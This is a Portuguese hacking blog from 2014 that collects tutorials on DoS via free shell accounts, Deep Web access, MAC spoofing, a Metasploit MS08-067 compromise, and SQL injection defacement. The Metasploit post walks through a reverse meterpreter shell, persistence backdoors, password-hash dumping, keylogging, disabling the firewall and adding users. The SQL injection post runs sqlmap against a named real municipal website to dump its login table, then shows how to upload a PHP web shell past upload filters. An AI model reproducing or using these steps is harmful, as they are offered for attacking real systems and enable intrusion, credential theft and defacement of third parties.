Newest Post

Tutorial DDOS com um unico PC

| quarta-feira, 16 de julho de 2014
Mais informações »
Introdução:
Galera vi que tem muita gente procurando por tutoriais sobre DDOS, ai vai espero que ajude.
Serve para servidores de pequeno/médio porte, então não vão querer sair por ai derrubando o site do FBI kk
Nada mais valioso para um hacker do que contas em vários computadores ligados na rede. Vou ensinar como conseguir algumas contas GRÀTIS e totalmente dentro da lei.

A muito tempo atrás, no tempo da net discada, a maioria dos provedores americanos davam shell accounts unix para seus usuários. Ainda hoje existem algumas universidades e empresas que fornecem esse serviço gratuitamente.
Uma shell account é uma conta em um computador Linux(ou até mesmo UNIX). Você ganha uma senha e um usuário, e pode usar o sistema livremente(quase...).
Em algumas shell accounts é possível que você abra um programa e deixe ele rodando quando sair. Ele vai ficar rodando até você entrar denovo na conta e fecha-lo.

Para derrubar o site você precisa criar uma conta em muitas shell accounts(vou passar o link de algumas no final do post). Depois você pega na internet o código de algum programa para ataque DoS(que rode no linux) faz upload para sua shell account, compila ele e bota pra rodar. Faça isso em várias shell accounts e você terá sucesso em seu ataque.

Importante: É preciso saber usar o Linux para usar as shell accounts, depois de uma pesquisada na net você aprende.
Serviços Shell Account Grátis:
exitem muitas, é só pesquisar no google por "free shell account"
procure por alguma que permita "background process". Essas que eu passei o link permitem.

Programa de Conexão por SSH(para se conectar as shell accounts):
Esse é o melhor programa SSH para Windows.

As shell accounts(a maioria pelo menos) vão te dar acesso a um servidor muito porrada. Eles costumam ter vários processadores em paralelo e muita memória.

Tutorial DDOS com um unico PC

Posted by : jean
Date :quarta-feira, 16 de julho de 2014
With 0comentários
Tag :

Aprenda a Acessar a DeepWeb

|
Mais informações »
A Deep Web parece uma obra da ficção científica, mas é exatamente o oposto. Ela é real e acreditem: há muita coisa ilegal e psicótica. Nela, é possível ver o trabalho de pessoas que fotografam crianças nuas, perversões sexuais envolvendo animais e defuntos e tráfico de drogas como Peyote, Maconha, LSD e remédios tarja preta. E isso é só a tampa do esgoto. A Internet, com seu uso anônimo, é uma máquina de fazer crimes e de contar os relatos dos mesmos.


Comecei falando da Deep Web, mas não expliquei do que ela se trata. Pois então: ela se trata de sites que são, ou pertencentes a uma rede que anonimiza seus usuários (mais sobre isso depois), ou também de sites inalcançáveis, que não possuem referência em lugar nenhum. Vamos supor que você crie um blog aqui no WordPress mesmo. Você o cria e imediatamente ele já está indexado aos provedores de buscas mais famosos. Trocando em miúdos, você digita o nome do seu blog no Google e ele aparecerá, provavelmente na primeira página. Podemos chamar todos os sites indexados pelos buscadores farofas que usamos todos os dias de Surface Web, que é a parte da Web que fica na superfície, sites dos quais a maioria das pessoas geralmente acessam: Orkut, Google, Hotmail, Badoo, Pirate Bay, Facebook, WordPress, Blogger, Twitter, Tumblr e por aí vai. Podemos encontrar esses sites através das metatags e das tags específicas no HTML que é retornado na nossa tela. Quando entramos em um site, fazemos uma requisição para o servidor do site desejado e ele retorna na nossa tela um código HTML, com todas as tags e metatags, com informações como desenvolveu o site, e as palavras chave de seu conteúdo, para que ele possa ser facilmente indexado a algum motor de busca. Na Deep Web, a idéia é ocultar as metatags ou deixá-las extremamente confusas, dificultando e muito o acesso do usuário e também dos motores de busca. É uma página da Internet no meio do nada. E qual o intuito de alguém criar uma webpage que pessoas leigas não poderiam acessar? Com um simples olhar na Hidden Wiki, vemos onde o buraco começa, e, conforme vamos nos aprofundando, a coisa vai piorando de maneira significativa, de modo que se desiste de entender as mentes insanas que acessam e criam esse tipo de conteúdo anônimo.


Bom, agora que eu contextualizei a Deep Web, vou fazer um guia rápido para quem tem curiosidade, estômago forte, nervos de aço e apaga na hora que vai dormir:


Como os sites perdidos na Web são praticamente inalcançáveis, algumas pessoas reuniram alguns dos sites mais populares do submundo e colocou-os em uma Wiki, denominada The Hidden Wiki, um site com páginas editáveis, na qual os usuários escrevem artigos e linkam as páginas referentes àquele assunto. Para entrar na Hidden Wiki, há a necessidade de um programa especial que deixa o usuário anônimo e permite que urls que terminam em *.onion (usadas na deep web) possam ser acessadas. Então, tudo a se fazer é baixar o Tor (o programa do qual eu estava falando), abrí-lo (ele abrirá um Firefox Portável após a conexão com a rede Tor) e inserir o seguinte link: http://kpvz7ki2v5agwt35.onion/


Muitos boatos cercam a Deep Web, mas o fato que mais intriga, é a falta de informações relevantes sobre o que exatamente é a Deep Web e o que é feito nela. Material criminoso, como pedofilia, zooflilia, necrofilia, venda de drogas, serviços de assassinato por aluguel, foruns hackers e rumores dizem até em Snuff Films (filmes reais de assassinatos) e foruns de comunicação de terroristas. Considerando que até “pessoas normais”, sem as habilidades de um hacker, consigam acessar a deep web, é no mínimo estranho que as autoridades responsáveis nada tenham feito sobre, e muito menos divulgado o submundo que existe muito perto do alcance de qualquer usuário da Internet.


ATENÇÃO!: Eu não se responsabiliza pelo conteúdo que o usuário encontrar, nem pelos traumas ou por possíveis prisões desencadeadas do mau uso desse tipo de rede.

Aprenda a Acessar a DeepWeb

Posted by : jean
Date :
With 0comentários
Tag :

Diferenças entre hackers, crackers...

|
Mais informações »
Aqui vai uma ajuda para vocês entenderem ou pouco a diferença entre hackers crackers lammers noobs. 


Quem nunca ouviu uma notícia na tv, rádio, internet ou qualquer outro meio de comunicação dizendo “Hackers invadiram o sistema de um banco e desviaram dinheiro“, ou “Hackers roubaram mais de 100 contas de sites pagos em computadores infectados“? Bom, para a mídia é fácil falar, mas laaaa atrás, quando algumas pessoas resolveram optar pelo lado negro de Hacking, os amantes e criadores da cultura hacker resolveram separar o bem do mau, isso através de nomes, e é isso que vamos ver agora.


Usando um exemplo bem simples, quando um policial comete um ato ilícito, ele ainda deve ser chamado de policial? Claro que não, a partir da hora que ele comete um ato ilícito como roubar por exemplo, esse policial passa a ser um ladrão, o mesmo acontece em Hacking, se um Hacker passa a cometer crimes na Internet ele não pode ser chamado mais de Hacker e sim de Cracker, agora se esse mesmo Hacker comete um ato ilícito usando cartões de crédito, ele também não continuar sendo chamado de Hacker e sim Carder. Para ficar mais organizado e fácil de entender, vamos falar sobre cada nome:



Hackers:

Individuo com amplo conhecimento em informática, que faz uso desse conhecimento para encontrar falhas e medidas de correção para essas falhas. Normalmente um Hacker atua na área de Segurança da Informação sendo um consultor de segurança ou prestando serviço para uma empresa do ramo.


Crackers:

Como os Hackers, os Crackers também possuem um conhecimento avançado em informática, porem as suas atitudes são diferentes, os Crackers usam o seu conhecimento apenas para beneficio próprio ou destruição, ao invés de desenvolver medidas de correção para uma vulnerabilidade, os Crackers criam códigos para explorar essa vulnerabilidade e conseguir destruir o sistema alvo, ou conseguir algo de valor como informações pessoais, informações bancárias, senhas, etc.


Carder:

 nome Carder é dado para a pessoa que utiliza informações bancárias como números de cartões de crédito, cartões de conta corrente ou poupança, ou contas em sites de movimentações bancárias, para beneficio próprio como comprar produtos, fazer transferência para contas de laranjas entre outros atos ilícitos. Uma coisa bem interessante que tem na Internet para download são geradores de cartões de crédito, alguns são até verdade, mas a maioria são arquivos maliciosos que podem prejudicar o seu computador.


Defacer:

O Defacer é o individuo que utiliza a tecnica Deface para pichar sites, eles exploram vulnerabilidades através de técnicas para conseguir acesso administrativo a um site para alterar a página inicial do mesmo, por uma que ele (invasor) criou. Normalmente a página criada pelo invasor serve como um meio ilícito de protesto contra o site ou ideologia do site, e é claro nessa mesma página tem uma frase de vitória seguida do nickename do invasor. A maior parte das vulnerabilidades em sites da Internet são SQL e PHP Injection.




Phreaker:

O Phreaker é o Hacker da telefonia móvel e fixa. Os Phreakers utilizam técnicas para burlar os sistemas de segurança das companhias telefônicas, normalmente para fazer ligações de graça ou conseguir créditos.



Cheater:

O nome Cheater é dado as pessoas que usam cheats (códigos que burlam o sistema de um jogo), para adquirir algum privilégio no jogo online ou local, ou seja, Cheats são trapaças, logo, Cheater são os trapaceiros.


Lammer:

Ao contrário do Hacker e do Cracker o Lammer não possui um bom conhecimento em informática, ele apenas procura tutoriais na Internet que ensinam a fazer invasões básicas, e quando ele consegue fazer a invasão ele se auto denomina Hacker, mas é claro, ele esta enganando apenas ele mesmo. Normalmente os Lammers não possuem uma sede de conhecimento, eles querem apenas fazer algo e pronto, se deu certo tranquilo, se não deu, vai para outra técnica, sem ao menos saber como a mesma funciona e porque não deu certo.



Noob:

O Noob ou Neewbie é aquele individuo que esta iniciando (no nosso caso em Hacking) e possui uma boa sede de conhecimento, não se denomina Hacker e sabe que ainda tem muito a aprender. Normalmente os Noobs fazem perguntas bobas e iniciantes em fóruns, comunidades e sites. Caso você seja um noob não tem vergonha, todos passam por essa fase, só tome cuidado para não se tornar um Lammer.



Script Kiddie:

Para entender bem o que é um script kiddie, nós podemos usar o noob como exemplo, os noobs são como aprendizes de Hacker, já os Script Kiddies são como aprendizes de Crackers. Normalmente essas pessoas utilizam técnicas que elas ainda não dominam para prejudicar computadores e também obter benefícios próprios, mas como se tratando de Crackers não há lei, a maioria dos Script Kiddies caem em armadilhas deixadas pelos Crackers e acabam sendo invadidos, ou até mesmo usados como escudo nas invasões dos Crackers, por exemplo, o Cracker invade um sistema grande usando um script kiddie como um zumbi primário, dessa forma o principal culpado das invasões será o Script Kiddie que foi invadido.

Esses são os nomes mais conhecidos. Muitas pessoas dizem que esses nomes não são precisos, que é pura bobagem e que Cracker e Hacker é tudo a mesma coisa, mas eu aposto que essas pessoas não gostariam de serem chamadas de ladrões ou bandidos sem nunca terem cometido algum delito!


Diferenças entre hackers, crackers...

Posted by : jean
Date :
With 0comentários
Tag :

Clonando endereço mac

|
Mais informações »
Pode-se dizer hoje em dia que uma das tecnicas mais utilizadas por hackers são a clonação de endereço MAC , assim é possível se passar por outras , maquinas por um dispositivo como um roteador ou dispositivos de redes que bloqueiam o acesso pelo endereço MAC , os endereços MAC cuja as siglas significam (Media ACCESS CONTROL) ele é feito por 48 bits (cerca de 6 bytes ja que são divididos por 8 / e quando queremos passar bytes para bits basta multiplicarmos por 8) , ele é composto por 12 digitos hexadecimais de 0-9 e de A-F um exemplo seria33:21:4H:3B:A9 vocês podem ver que ele utiliza um separador '':'' (dois pontos) ''-'' (traço) cada 2 digitos exadecimais tem 8 bits já que um endereço MAC tem 48 bits ou 6 octetos. Normalmente os 3 primeiros ''dois'' digitos são reservados a fabricantes e os outros para numeros diferentes , isso garante de que nunca um endereço MAC seja igual ao outro .


Para que serve
Os IP's são unicos porem podem estar em computadores diferentes mais os endereços MAC ao contrario dos IP's são unicos e não podem ser transferidos , ou seja cada placa de rede tem seu próprio e unico endereço MAC , eles poder ser trocados mais apenas de uma forma reescrevendo a memória ROM , mais veremos como alterar o endereço MAC , o proprio , Ubuntu , Mac , Backtrack e outras distribuições baseadas no mac permitem que mudemos o endereço MAC VIRTUALMENTE , ou seja fariamos nosso ''computador'' mentir quando fosse solicitado o endereço MAC que é mais ou menos assim que funciona a tecnica de spoofing pelo mac vamos a pratica.


Botando em prática:


1° Iremos ao terminal
2° Iremos logar como super user com os comandos
Código: 
sudo suisso fará com que entremos em modo ROOT ja que teremos de ter privilegios especias para executar a troca .
3° Vendo qual endereço MAC com os comandos
Código: 
ifconfigdeverá aparecer algo assim :
Código: 
eth0 Link encap:Ethernet HWaddr 0c:dd:e4:fb:35:25 <<< (***************MAC*************)
inet addr:192.168.0.101 Bcast:192.168.0.255 Mask:255.255.255.0
inet6 addr: fe80::eee:e6ff:fefb:3303/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:18200 errors:0 dropped:0 overruns:0 frame:0
TX packets:13432 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000 
RX bytes:24552249 (24.5 MB) TX bytes:1419473 (1.4 MB)
Interrupt:42 Base address:0x4000 


lo Link encap:Local Loopback 
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:114 errors:0 dropped:0 overruns:0 frame:0
TX packets:114 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0 
RX bytes:23003 (23.0 KB) TX bytes:23003 (23.0 KB)


4° Vamos dar um down ou seja desligar a interface de rede no caso a minha está como eth0 , mais pode ser ela wlan0 , wlan1 para conexões wifi dependendo de quais dispositivos e caso tenha uma maquina virtual aparecera vmnet1 já que estou usando o vmware . Vamos dar um down com o seguinte comando :
Código: 
ifconfig **interface**de**rede downno meu caso que é etho ficará assim
Código: Selecionar todos
ifconfig eth0 down
5° Alterando o endereço MAC : Pronto desligamos a interface agora fica facil e só executar o comando
Código: Selecionar todos
ifconfig eth0 hw ehter 00:25:67:12:34:41pronto alteramos para o endereço MAC 00:25:67:12:34:41 depois de feito isso basta ligarmos novamente a interface com o comando contrário de down o up
6° Ligando novamente a interface : O comando é
Código: Selecionar todos
ifconfig **interface**de**rede** upno meu caso como ela e eth0 o comando será o seguinte
Código: Selecionar todos
ifconfig eth0 up.
7° Endereço de MAC alterado com sucesso: Após feito isso basta dar o comando
Código: Selecionar todos
ifconfignovamente e verás que o endereço de MAC foi alterado como no exemplo :
Código: 


eth0 Link encap:Ethernet HWaddr 00:25:67:12:34:41<<<< (**********************MAC**********************)
inet addr:192.168.0.101 Bcast:192.168.0.255 Mask:255.255.255.0
inet6 addr: fe80::eee:e6ff:fefb:3303/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:18200 errors:0 dropped:0 overruns:0 frame:0
TX packets:13432 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000 
RX bytes:24552249 (24.5 MB) TX bytes:1419473 (1.4 MB)
Interrupt:42 Base address:0x4000 


lo Link encap:Local Loopback 
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:114 errors:0 dropped:0 overruns:0 frame:0
TX packets:114 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0 
RX bytes:23003 (23.0 KB) TX bytes:23003 (23.0 KB)


Como pode ver o endereço mac foi alterado com sucesso

Clonando endereço mac

Posted by : jean
Date :
With 0comentários
Tag :

Comandos Básico no BACKTRACK para Iniciantes

|
Mais informações »
Simples conexão, Mas Bem Divertido
Abra o console e digite: msfconsole
msf >use windows/smb/ms08_067_netapi
msf >exploit(ms08_067_netapi) >set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf >exploit(ms08_067_netapi) >set LHOST 192.168.0. 0 IP do Cliente (Seu IP)
lhost => 192.168.0.0
msf >exploit(ms08_067_netapi) >set RHOST 192.168.1.1 IP do Servidor (Vitima)
rhost => 192.168.1.1
msf >exploit(ms08_067_netapi) >set LPORT 4444 Porta Padrão
msf >exploit(ms08_067_netapi) > exploit


[*] Started reverse handler on 192.168.1.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:Portuguese - Brazilian
[*] Selected Target: Windows XP SP3 Portuguese - Brasilian (NX)
[*] Attempting to trigger the vulnerability....
[*] Sending stage (752128 bytes) to 192.168.0.0
[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.0.0:1035 at 2012-07-06 02:15 -0500


meterpreter >
Digite: ipconfig, Vai Listar as interface da vitima
EX: meterpreter>ipconfig
Digite: sysinfo, Vai Lista O Sistema de Informação da vitima
EX:meterpreter>sysinfor
Computer : VITIMA-D880F4A3B
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : pt_BR
Meterpreter : x86/win32


Digite ps, Vai Listar, A Lista de Processos da vitima
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86 0
428 320 explorer.exe x86 0 VITIMA-D880F4A3B\Administrador C:\WINDOWS\Explorer.EXE
552 4 smss.exe x86 0 AUTORIDADE NT\SYSTEM \SystemRoot\System32\smss.exe
616 552 csrss.exe x86 0 AUTORIDADE NT\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
.....
Caso queira desativar algum processo
Digite: kill
Ex: meterpreter > kill 552


Se a poderi do processo explorer.exe com o seguinte comando: migrate + o numero do processo
EX:meterpreter > migrate 428
[*] Migrating to 428...
[*] Migration completed successfully.


Digite getuid, Vai mostrar o nome o adimin da vitima
meterprter > getuid
Server username: VITIMA-D880F4A3B\Administrador


Digite shell, Vai entra no console da vitima
meterpreter >shell
Process 4024 created.
Channel 1 created.
Microsoft Windows XP [vers�o 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrador>
Va ate a pasta system32
Digite: cd
EX: C:\Documents and Settings\Administrador>cd\
Digite: cd windows/system32
EX: C:\>cd windows/system32


C:\WINDOWS\system32> Agora vc ta na pasta system32


Perpare-se para RDP, com o seguinte comando:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
Assim:
C:\WINDOWS\system32>reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f


E o outro comando:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
Assim:
C:\WINDOWS\system32>reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f


Agora Ativar e Desativar o Firewall da Vitima, com o seguinte comando:
Netsh firewall set opmode enable NOTA: ATIVAR
Netsh firewall set opmode disable NOTA: DESATIVAR
C:\WINDOWS\system32>Netsh firewall set opmode enable
C:\WINDOWS\system32>Netsh firewall set opmode disable


Criar uma conta de Usuario no PC da Vitima, com o seguinte comando:
net user [USERNAME] [PASSWORD] /add
EX: C:\WINDOWS\system32>net user Private abcd1234 /add
Private, é o nome de usuario da conta, pode ser qualquer nome
abcd1234, é a senha, qualquer senha
Criada a conta de usuario
Ctrl + z e y pra sair do shell (console)
meterpreter >


Configurando backdoors para uso futuro. com o seguinte comando:
run persistence -r [Seu IP] -p [Sua Porta] -A -X -i 300
EX: meterpreter > run persistence -r 192.168.0.0 -p 443 -A -X -i 300
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/ .msf4/log/persistence/Cliente_PC201202222.3842/Cliente_PC201202222.3842.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.0.0 LPORT=443
[*] Persistent agent Script is 609600 bytes long
[+] Persistent Script written to C:\Usuarios\Vitima\AppData\Local\Tem\agDcmcMuDthQD.vbs
[*] Starting connection hantler at port 443 for windows/meterpreter/reverse_tcp
[+] Multi/Hantler started!
[*] Executing script C:\Usuarios\Vitima\AppData\Local\Tem\agDcmcMuDthQD.vbs
[+] Agente executed winth PID 4664
[*] Installing into autorun as HKLM\Software\Micosoft\CurrentVesion\Run\VxEMqmdWo
[+] Installed into autorun as HKLM\Software\Micosoft\CurrentVesion\Run\VxEMqmdWo
meterpreter >


Logar como system
meterpreter > getsystem
Ganhar privilegios
meterpreter > user priv
Executar um comando na maquina remota
meterpreter > execute -f cmd.exe -i –H
Exibir a lista do banco de dados SAM
meterpreter > run post/windows/gather/hashdump
Iniciar um keylogger nativo do meterpreter
meterpreter > keyscan_start
Para o keylogger
meterpreter > keyscan_stop
Analisar o que foi capturado e
meterpreter > keyscan_dump
Enviar um arquivo
meterpreter > upload evil_trojan.exe c:\\windows\\system32
Copiar um arquivo
meterpreter > download c:\\boot.ini Pode ser qualquer coisa que vc queira

Comandos Básico no BACKTRACK para Iniciantes

Posted by : jean
Date :
With 0comentários
Tag :

SQL injection | Deface Simples.

|
Mais informações »
Bom,Primeiro passo é encontrar um Site Vulnerável. E pra isso Usaremos DORKS.


DORKS,são endereços aos quais você associa ao Google,Procurando sites Vulneráveis!


Lista de 7,000 DORKS: http://pastebin.com/iAA7Ptnw

Após abrir um site,depois de Jogar algumas dessas DORKS no Google,Você Vai ter que "Testar" Pra ver se o link é vulnerável;

Para isso você vai por o sinal de aspas (') no final da URL.Se for Vulnerável você vai se deparar com um erro,
Parecido com esse ( You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 )



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Bom achamos um Site Vulnerável...


Agora vamos para o SQLMAP

1° Baixe o SQLMAP


Extraia o arquivo, Para o C: (Para mim fica mais fácil).

Após baixar e Extrair,baixe o Python 2.7: (Necessário para rodar o SqlMap) .



Após ter Instalado o python 2.7.vamos Usar o SQLMAP!

Se você extraiu o sqlmap para o C: ,usaremos os Seguintes Comandos com o Prompt De Comando. (Comandos Grifados)

C:\Documents and Settings\Admin>cd \

C:\>cd sqlmap

C:\sqlmap>sqlmap.py -u http://www.ubatuba.sp.gov.br/secret/secret.php?id=13 --dbs (esse comando "--dbs" listará as DBS existentes)
Após isso vai aparecer, as DBS existentes.
----
[*] information_schema
[*] siteubt
[*] test
----
Ok,temos as DBS;eu costumo ir marcando tudo em um txt.
Agora vamos Procurar a DB que o site está usando,usaremos o seguinte comando.

C:\sqlmap>sqlmap.py -u http://www.ubatuba.sp.gov.br/secret/secret.php?id=13 --current-db (esse comando "--current-db" vai listar a DB que o site esta usando.
--
current database: 'siteubt'
---
Pronto sabemos que a DB que está sendo suada é siteubt

Agora vamos Listar as tabelas existentes nessa DB,então usaremos o seguinte comando.

C:\sqlmap>sqlmap.py -u http://www.ubatuba.sp.gov.br/secret/secret.php?id=13 -D siteubt --tables (esse comando "-D siteubt --tables","-D" especifica a DB e "--tables" vai listar as tabelas.

+-----------------+
| a3_questionario |
| agenda |
| agentes |
| anexos |
| brinq_cad |
| brinq_freq |
| cad_edital |
| cad_edital2 |
| ccz |
| concurso |
| concurso2 |
| concurso_emdurb |
| dias |
| documento |
| dperiodo |
| esportes |
| falacidadao |
| foto |
| foto_hab |
| foto_pag |
| foto_san |
| fotos |
| frotas |
| galeriafotos |
| guiasn |
| infoccz |
| issretencao |
| itbi |
| licit |
| log_setor |
| login |
| login2 |
| logs |
| luos |
| menu |
| noticias |
| notluos |
| obras |
| pagina |
| pbairros |
| pcidade |
| pescola |
| pfamilias |
| pidoso |
| pidososinfo |
| pmedicamento |
| pmedutil |
| pmhis |
| pmsb |
| pservsaude |
| pssaudeutil |
| rh1 |
| rh2 |
| secretarias |
| servicosocial |
| tipo |
| tipo2 |
| tipo_hab |
| viaiptu |
+-----------------+
Pronto,ai temos as tabelas, Agora partir dai procuraremos uma tabela que seja de nosso interesse,como exemplo, uma que podemos usar para Logar no site,digamos,coisas preciosas... No caso vemos ali 3 tabelas que podem sem do nosso interesse.
---
log_setor
login
login2
---
Bom agora vamos listar as tabelas,e vamos ver as colunas que tem nelas,Usaremos o seguinte comando.


C:\sqlmap>sqlmap.py -u http://www.ubatuba.sp.gov.br/secret/secret.php?id=13 -D siteubt -T login --columns (esse comando irá listar as colunas dentro da tabela "login")

Nos deparamos Com as seguintes colunas.

+----------+-------------------------------+

| Column | Type | 
+----------+-------------------------------+
| codlogin | mediumint(8) unsigned |
| login | varchar(100) |
| senha | varchar(120) |
+----------+-------------------------------+

login e senha...iremos dar um DUMP neles....Então usaremos o seguinte comando.(Lembrando que eu vou anotando todos os resultados que consigo em todo esse procedimento)


C:\sqlmap>sqlmap.py -u http://www.ubatuba.sp.gov.br/secret/secret.php?id=13 -D siteubt -T login -C login,senha --dump (esse comando "--dump" mostrara os resultados que tanto queremos '-' )

Se você quer explorar muito o site,dump em todas as tabelas de todas as DBs =D


Bom nesse procedimento usamos os Seguintes comandos...

***COMANDOS***

sqlmap.py --url *************** --dbs
sqlmap.py --url *************** --current-db
sqlmap.py --url *************** -D 'databasedosite' --tables
sqlmap.py --url *************** -D 'databasedosite' -T 'tabeladosite' --columns
sqlmap.py --url *************** -D 'databasedosite' -T 'tabeladosite" -C 'colunasdosite' --dump

************ é o site que você vai invadir

Nas colunas não se esqueça de separar por , [virgula] ex. usuario,senha --dump


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ok,por exemplo,se conseguirmos Logins e senhas de administradores do site,vamos precisar,Procurar uma area de LOGIN para efetuar o deface. Eu uso o ACUNETIX pois ele lista as pastas que estão no site.



LINK: http://www.acunetix.com/vulnerability-scanner/download.htm


OBS: Acunetix é bom que ele é uma ferramenta que procura falhas no site,com sorte,você pode encontrar diversas falhas escaneando um site com o acunetix.



Ok,após logarmos no site,o que temos a fazer,e encontrar uma área de Upload,e fazer upload de nossa shell...Com a shell podemos alterar o site.


Certos sites,recusam fazer upload de arquivos .php , Como a shell é .php , temos que burlar o upload, faremos da shell, JPG, como se fosse imagem,o que tem que fazer é mudar de .php para .php.jpg , assim taremos upando a shell como imagem.

Existem várias formas de se burlar sistemas de upload de imagens em sites.
Nesse tutorial vou explicar os mais conhecidos métodos e é claro, os melhores métodos.
O porque de nós querermos burlar o sistema, é facil, nós queremos burlar ou para colocar um outro tipo de extensão ou ter algum privilégio no site ou no servidor onde ele está HOSPEDADO.
Para termos algum tipo de privilégio, nós teremos que upar uma shell, no caso em PHP ou em C, que será demonstrado nesse tutorial.
Quando você vai upar uma shell em PHP em um sistema de upload de imagens .jpg, ele através do filtro de extensões, ele vai te dar um aviso de que não é possível fazer upload desse arquivo.
O que temos que fazer é descobrir porque ele não nos dá essa permissão.
A primeira coisa que temos que verificar é se ele pega apenas a primeira extensão depois do primeiro ponto (.), por isso iremos tentar upar nossa shell da seguinte forma renomeando o arquivo:
Exemplo:
minhashell.jpg.php
Assim ele seria reconhecido como um arquivo PHP, pois a real extensão é .php.

Na maioria das vezes essa técnica funciona, mas é claro que tem sites que não irão aceitar isso, por isso iremos tentar de outra forma.

Alguns sites pegam apenas a última extensão do arquivo, mas apenas reconhecem a primeira extensão depois do ponto, assim nós podemos upar a shell da seguinte forma:
Exemplo:
minhashell.php.jpg OU minhashell.jpg.php
Assim ele seria reconhecido como um arquivo PHP, pois a extensão real é jpg, mas como é eliminada a segunda extensão, então ele seria renomeado pelo filtro para um arquivo .php.


Um outro tipo de filtro vulnerável é o filtro em que se pode anular a última extensão através de um comando null antes da última extensão.

O arquivo renomeado ficaria assim:
Exemplo:
minhashell.php.jpg OU minhashell.jpg. php
O filtro iria aceitar o arquivo por ele ser uma extensão .jpg, porém como à um comando anulando a última extensão, então ele reconheceria o arquivo como .php apenas.


A maioria dos sistemas de upload reconhece apenas a extensão do arquivo, mas não o tipo de arquivo, isso é muito perigoso para o servidor, pois um arquivo pode ter uma extensão .jpg mas ser um arquivo do tipo PHP.



Com isso o arquivo terá uma extensão .jpg e será HOSPEDADO no servidor, mas através de um exploit, ele pode ser renomeado ou você pode modificar um arquivo JPG com linhas em PHP com um editor hexadecimal, mas na maioria das vezes o arquivo corrompe, ficando assim impossibilitado de seguir qualquer comando estabelecido por você.


Outro caso é que o servidor apenas reconhece o tipo de arquivo, mas não a extensão.

Um modo de mudar essa situação é usando o edjpgcom, um software próprio para fazer esse tipo de modificação em arquivo JPG.

A primeira coisa que você vai fazer é criar um pasta chamada jpg no seu C:\ e extrair esse arquivo nessa pasta.

Agora abra o CMD (prompt de comando).
Agora dê um
Exemplo:
cd c:\jpg
Dê o seguinte comando agora:
Exemplo:
edjpgcom.exe suaimagem.jpg
Irá aparecer uma janela e no campo de texto terá um texto, remova esse texto e ponha sua linha de comando em PHP, que será sua shell/exploit e salve.
Não coloque comandos muito grandes, pois irá corromper o arquivo, ponha apenas algumas linhas (a shell c99 não funciona nesse caso pois ela é grande).
Agora renomeie o arquivo para .php e faça upload pelo sistema de upload do site e pronto, não irá mais aparecer aquele erro de "Invalid file Dimensions".


Ou podem fazer do seguinte modo ;

Exemplo:
GIF89a;
<?php
/* r57 shell here */
?>

SQL injection | Deface Simples.

Posted by : jean
Date :
With 0comentários
Tag :

Gerador de Cartão de Credito

|
Mais informações »


Atenção:
Este gerador de Cartão de Crédito tem como
proposta auxiliar programadores, analistas, testadores e
estudantes a gerar números de cartões de crédito válidos
para utilização em testes de aplicações em desenvolvimento.
A má utilização desta informação é de total responsabilidade do usuário.



Gerador de Cartão de Credito

Posted by : jean
Date :
With 0comentários
Tag :
Prev
▲Top▲